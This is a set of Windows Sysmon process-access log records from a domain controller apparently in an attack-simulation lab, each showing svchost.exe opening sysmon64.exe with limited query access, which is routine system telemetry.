{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1304,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.111\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.111","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1305,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.111\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.111","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1306,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.111\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.111","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1307,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.111\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.111","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1308,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.111\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.111","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1309,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.111\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.111","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1310,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.111\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.111","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1311,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.127\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.127","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
